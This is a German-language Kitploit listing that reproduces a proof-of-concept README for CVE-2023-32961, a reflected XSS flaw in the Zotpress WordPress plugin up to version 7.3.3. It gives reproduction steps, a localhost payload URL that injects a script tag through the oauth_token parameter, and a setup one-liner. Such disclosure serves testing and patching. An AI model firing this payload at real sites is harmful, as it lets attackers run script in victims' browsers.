Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-32961 — PoC für CVE-2023-32961 | Kitploit
Tools/GitHubGitHub/lourc0d3/cve-2023-32961
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC für CVE-2023-32961

Repository anzeigen
21vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-32961

Dieses Repository behandelt eine XSS-Schwachstelle im WordPress-Plugin Zotpress.

Komponentendetails


Komponentenname

Zotpress

Verwundbare Version

≤ 7.3.3

Komponenten-Slug

zotpress

Komponenten-Link

https://wordpress.org/plugins/zotpress/

Voraussetzung


Ohne Authentifizierung

Details zur Schwachstelle


Kurzbeschreibung

Die Funktion get_request_token in zotpress/lib/admin/admin.accounts.oauth.php ist anfällig für eine XSS-Attacke.

So lässt es sich reproduzieren (PoC)

  1. Installieren Sie die OAuth-PHP-Erweiterung, um die Schwachstelle auszulösen. (Dies ist optional für Zotpress.)
  2. Melden Sie sich bei zotero.org an.
  3. Die Bedingungen für die Ausführung der Funktion get_request_token müssen erfüllt sein. (nur beim ersten Mal) Senden Sie einen Payload wie diesen: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Senden Sie den folgenden Payload: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Zusätzliche Informationen

  • Sie benötigen ein zotero.org-Konto.

  • Sie müssen den Wert von oauthState auf 1 setzen, um die Schwachstelle auszulösen. Wenn der obige Payload nicht funktioniert, müssen Sie einen Weg finden, oauthState auf 1 zu setzen.

    • Bedingungsausdruck:

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Einfache Installation der PHP-OAuth-Erweiterung:

    • Einzeiler:

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Getestet im Docker-Image wordpress:latest.

PoC-Video

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Referenzen


CVE-2023-32961

Tool herunterladen